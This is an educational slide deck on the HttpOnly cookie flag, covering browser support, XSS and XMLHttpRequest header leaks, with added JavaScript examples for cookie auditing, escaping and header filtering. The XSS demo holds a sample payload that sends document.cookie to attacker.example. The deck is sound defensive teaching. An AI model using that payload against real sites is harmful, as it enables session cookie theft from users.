Http only cookie

A detailed introduction to the HttpOnly cookie flag, with plenty of demonstrations.


  1. HttpOnly Cookie: Something You Don't Know About HTTP. RDSS Team, 2012-04
  2. Author: 兰七, yuxia0025@gmail.com
  3. About RDSS: Research on Domain Specific Solutions. We focus on existing specifications, solutions, products, etc., and put our research into practice.
  4. Contents: Cookie Definition; HttpOnly Cookie; Browser Support; Cross-Site Scripting; XMLHttpRequest; Finally
  5. Cookie Definition
  6. A cookie, also known as an HTTP cookie, web cookie, or browser cookie, is a piece of data stored by a website within a browser and subsequently sent back to the same website by the browser. Refer: http://en.wikipedia.org/wiki/Http_cookie#HttpOnly_cookie
  7. HttpOnly Cookie
  8. Definition: HttpOnly is an additional flag included in a Set-Cookie HTTP response header. An HttpOnly session cookie is used only when transmitting HTTP (or HTTPS) requests; it is not exposed to client-side script. Refer: http://en.wikipedia.org/wiki/Http_cookie#HttpOnly_cookie
  9. Born: HttpOnly cookies were first implemented in 2002 by Microsoft Internet Explorer developers for Internet Explorer 6 SP1. Refer: https://www.owasp.org/index.php/HttpOnly#Who_developed_HttpOnly.3F_When.3F
  10. Features: the flag restricts access to the cookie from non-HTTP APIs (such as JavaScript). This restriction mitigates but does not eliminate the threat of session cookie theft via cross-site scripting (XSS): an injected script can no longer read the cookie value, but it can still issue requests from the victim's browser that carry the cookie. Refer: https://www.owasp.org/index.php/HttpOnly#Who_developed_HttpOnly.3F_When.3F
  11. Syntax: Set-Cookie: USER=123; expires=Wednesday, 09-Nov-99 23:12:40 GMT; HttpOnly (USER is the cookie name, 123 its value; HttpOnly is a bare attribute that takes no value). Refer: https://www.owasp.org/index.php/HttpOnly#Who_developed_HttpOnly.3F_When.3F
  12. Setting HttpOnly in PHP. Globally, for the session cookie: session.cookie_httponly = True (in php.ini). Per cookie: setcookie("testcookie", $value, time()+3600, "/", "www.xx.com", 0, 1); the sixth argument (0) is the secure flag, the seventh (1) is httponly. Refer: http://www.php.net/manual/en/function.setcookie.php
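As an added example (not code from the slides), the header that the PHP call above produces, built and checked by hand in JavaScript. The cookie value, the fixed expiry date (slide 11's) and the companion Secure check are assumptions for the demo.

```javascript
// Added example, not code from the slides: build the Set-Cookie header that
// PHP's setcookie("testcookie", $value, time()+3600, "/", "www.xx.com", 0, 1)
// emits, parse it back, and audit it for the HttpOnly flag (and Secure).

// Build one Set-Cookie header value. `expires` is a Date so the output is
// deterministic; Secure and HttpOnly are bare attribute names, matching the
// slide's "...; HttpOnly" syntax.
function buildSetCookie(name, value, { expires, path = '/', domain, secure = false, httpOnly = false } = {}) {
  // RFC 6265 token characters for the name; values may not contain whitespace, ; , " or \
  if (!/^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$/.test(name)) throw new Error(`invalid cookie name: ${name}`);
  if (/[\s;,"\\]/.test(value)) throw new Error('invalid cookie value');
  const parts = [`${name}=${value}`];
  if (expires) parts.push(`expires=${expires.toUTCString()}`);
  if (path) parts.push(`path=${path}`);
  if (domain) parts.push(`domain=${domain}`);
  if (secure) parts.push('Secure');
  if (httpOnly) parts.push('HttpOnly');
  return parts.join('; ');
}

// Parse a Set-Cookie header value into { name, value, attributes }. Attribute
// names are lower-cased (browsers match them case-insensitively); valueless
// attributes such as HttpOnly become `true`.
function parseSetCookie(header) {
  const [pair, ...rawAttrs] = header.split(';').map(s => s.trim());
  const eq = pair.indexOf('=');
  const name = eq === -1 ? '' : pair.slice(0, eq).trim();
  const value = eq === -1 ? pair : pair.slice(eq + 1).trim();
  const attributes = {};
  for (const attr of rawAttrs) {
    if (!attr) continue;
    const i = attr.indexOf('=');
    const key = (i === -1 ? attr : attr.slice(0, i)).trim().toLowerCase();
    attributes[key] = i === -1 ? true : attr.slice(i + 1).trim();
  }
  return { name, value, attributes };
}

// Audit one Set-Cookie header the way a reviewer of a captured response would:
// the slide's point is HttpOnly; Secure is the companion flag a cookie served
// over HTTPS should also carry (assumed check, not from the slides).
function auditSetCookie(header, { overHttps = true } = {}) {
  const { name, attributes } = parseSetCookie(header);
  const findings = [];
  if (!('httponly' in attributes)) {
    findings.push(`HttpOnly missing on "${name}": readable via document.cookie by any injected script`);
  }
  if (overHttps && !('secure' in attributes)) {
    findings.push(`Secure missing on "${name}": will also be sent over plain HTTP`);
  }
  return findings;
}

// Equivalent of the slide's PHP call (0 = secure off, 1 = httponly on), with
// slide 11's date instead of time()+3600 so the output is reproducible.
const phpEquivalent = buildSetCookie('testcookie', 'abc123', {
  expires: new Date(Date.UTC(1999, 10, 9, 23, 12, 40)),
  path: '/',
  domain: 'www.xx.com',
  secure: false,
  httpOnly: true,
});
```

Running `auditSetCookie(phpEquivalent)` reports only the missing Secure flag, which is exactly what the PHP call's sixth argument of 0 leaves out; a header such as `PHPSESSID=x1; path=/` gets both findings.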
  13. Browser Support
  14. Supported: the cookie cannot be accessed through client-side script, so even if a cross-site scripting (XSS) flaw exists and a user accidentally follows a link that exploits it, the browser (primarily Internet Explorer) will not reveal the cookie to a third party. Refer: https://www.owasp.org/index.php/HttpOnly#Who_developed_HttpOnly.3F_When.3F
  15. Not supported: the HttpOnly flag is ignored by the browser, creating a traditional, script-accessible cookie readable through document.cookie. Refer: https://www.owasp.org/index.php/HttpOnly#Who_developed_HttpOnly.3F_When.3F
  16. Browsers Supporting HttpOnly Cookie

                     IE6  IE7  IE8  IE9  Chrome  Firefox  Safari
      prevent write  yes  yes  yes  yes  yes     yes      yes
      prevent read   yes  yes  yes  yes  yes     yes      yes

      Refer: https://www.owasp.org/index.php/HttpOnly#Who_developed_HttpOnly.3F_When.3F
  17. Refer: http://www.browserscope.org/security/test
  18. WebGoat. Refer: http://code.google.com/p/webgoat/
  19. Cross-Site Scripting
  20. Cross-site scripting is a server-side vulnerability that is often created when rendering user input as HTML; an attacker can use it, for example, to expose sensitive information about users of the web site. Refer: http://msdn.microsoft.com/en-us/library/ms533046.aspx
  21. Example. Refer: http://msdn.microsoft.com/en-us/library/ms533046.aspx
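An added illustration of the defect slide 20 describes, not code from the slides or from the MSDN article: a page fragment that concatenates a search term straight into HTML, the escaped version, and a constructed cookie-stealing payload as the input. The attacker host and the search-page markup are made up for the demo.

```javascript
// Added example, not code from the slides: user input rendered as HTML
// (vulnerable) beside the escaped rendering (fixed). The payload is the
// classic session-theft XSS that HttpOnly is meant to blunt; it and the
// attacker.example host are constructed for this demo.

const PAYLOAD = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>';

// Vulnerable: the search term is concatenated directly into the markup, so
// a term containing markup changes the page's structure.
function renderSearchUnsafe(term) {
  return `<p>Results for: ${term}</p>`;
}

// Fix: escape the characters that let data break out of a text node or an
// attribute value. Every other character is passed through unchanged.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, ch => map[ch]);
}

function renderSearchSafe(term) {
  return `<p>Results for: ${escapeHtml(term)}</p>`;
}

// Crude check for the demo: does the output still contain a script element?
function containsScriptElement(html) {
  return /<script\b/i.test(html);
}
```

With the unsafe renderer the payload survives as a `<script>` element and its `document.cookie` read would return every cookie the browser does not mark HttpOnly; with the safe renderer the same input is inert text. HttpOnly is the second layer: it keeps the session cookie out of that `document.cookie` read when the first layer (escaping) has been missed somewhere.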
  22. XMLHttpRequest
  23. getResponseHeader and getAllResponseHeaders: in early HttpOnly implementations these XMLHttpRequest methods still returned the Set-Cookie response header, so a script could read an HttpOnly cookie from the header text even though document.cookie hid it. Refer: http://ha.ckers.org/blog/20070719/firefox-implements-httponly-and-is-vulnerable-to-xmlhttprequest/
  24. Set-Cookie and Set-Cookie2: Set-Cookie is defined in RFC 2109, Set-Cookie2 in RFC 2965; each carries one or more key-value pairs. Refer: http://www.ietf.org/rfc/rfc2965.txt
  25. Fixed browsers: Firefox 3.0.0.6; IE; Safari 5 and Chrome 12. Firefox bans all cookie headers from XMLHttpRequest, not only the HttpOnly ones.
  26. Test tool: Robert Hansen's HttpOnly test page now includes Set-Cookie and Set-Cookie2 checks for XMLHttpRequest exposure. Refer: http://ha.ckers.org/httponly.cgi
  27. Test Result

                             IE6           IE7           IE8           IE9           Chrome        Firefox       Safari
      A (document.cookie)    not httpOnly  not httpOnly  not httpOnly  not httpOnly  not httpOnly  not httpOnly  not httpOnly
      B (XHR API)            not httpOnly  not httpOnly  not httpOnly  not httpOnly  no            no            no

      Reading the table together with slide 25: "not httpOnly" means only the cookie set without the HttpOnly flag was exposed; "no" means neither cookie was exposed, which is the behaviour of the browsers that hide all cookie headers from XMLHttpRequest.
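As an added example (not code from the slides or from the ha.ckers.org test page), the following JavaScript models paths A and B from the table above and the header filter from slide 25, and includes the browser-console probe the test page relies on. The sample HTTP response, cookie names and values are constructed for the demo.

```javascript
// Added example, not code from the slides or from Robert Hansen's test page:
// a model of the two script-side paths to a cookie (A: document.cookie,
// B: XMLHttpRequest response headers) and of the header filter browsers
// adopted to close path B. The response below is constructed for the demo.

const SAMPLE_RESPONSE = [
  'HTTP/1.1 200 OK',
  'Content-Type: text/html; charset=utf-8',
  'Set-Cookie: SID=7f3a9c1e2b; path=/; HttpOnly',  // the session cookie, flagged
  'Set-Cookie: theme=dark; path=/',                // an ordinary cookie
  'Set-Cookie2: legacy=1; Version=1',              // RFC 2965 form, same exposure problem
  '',
  '<html><body>hello</body></html>',
].join('\r\n');

// Split a raw HTTP response into its header lines as { name, value } pairs.
function parseHeaders(raw) {
  const lines = raw.split('\r\n\r\n')[0].split('\r\n').slice(1); // drop status line and body
  return lines.map(line => {
    const i = line.indexOf(':');
    return { name: line.slice(0, i).trim(), value: line.slice(i + 1).trim() };
  });
}

const isCookieHeader = h => /^set-cookie2?$/i.test(h.name);
const hasHttpOnly = value => /;\s*httponly\s*(;|$)/i.test(value);
const cookieName = value => value.split(';')[0].split('=')[0].trim();

// Path A: document.cookie. All browsers in slide 16 honour HttpOnly here, so
// only cookies set without the flag are visible. Set-Cookie2 is ignored
// because the mainstream browsers never implemented it.
function documentCookieView(raw) {
  return parseHeaders(raw)
    .filter(h => /^set-cookie$/i.test(h.name) && !hasHttpOnly(h.value))
    .map(h => cookieName(h.value));
}

// Path B before the fix: xhr.getAllResponseHeaders() returned every header,
// Set-Cookie included, so an XSS payload could read the HttpOnly cookie anyway.
function xhrHeadersBeforeFix(raw) {
  return parseHeaders(raw).map(h => `${h.name}: ${h.value}`);
}

// Path B after the fix: Set-Cookie and Set-Cookie2 are dropped from what XHR
// exposes (the "ban all cookie headers" behaviour slide 25 attributes to Firefox).
function xhrHeadersAfterFix(raw) {
  return parseHeaders(raw).filter(h => !isCookieHeader(h)).map(h => `${h.name}: ${h.value}`);
}

// Given a header listing as script would see it, which HttpOnly cookies leak?
function leakedHttpOnlyCookies(headerLines) {
  return headerLines
    .filter(line => /^set-cookie2?:/i.test(line))
    .map(line => line.slice(line.indexOf(':') + 1).trim())
    .filter(hasHttpOnly)
    .map(cookieName);
}

// Browser-console version of path B, i.e. the check the ha.ckers.org test page
// performs against the current origin. Returns null outside a browser.
function probeViaXhr(url) {
  if (typeof XMLHttpRequest === 'undefined') return null;
  const xhr = new XMLHttpRequest();
  xhr.open('GET', url, false); // synchronous: acceptable for a one-off console probe
  xhr.send();
  return xhr.getAllResponseHeaders();
}
```

On the sample response, path A yields only `theme`, the pre-fix path B leaks `SID` despite its HttpOnly flag, and the post-fix path B leaks nothing, which is the "no" result in the table's Chrome, Firefox and Safari cells. To reproduce path B against a live page, paste the block into the browser console and call `probeViaXhr(location.href)`: if the returned string contains a `Set-Cookie:` line, that browser still exposes cookie headers to script.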
  28. Finally
  29. HttpOnly Cookie: Pros; Cons
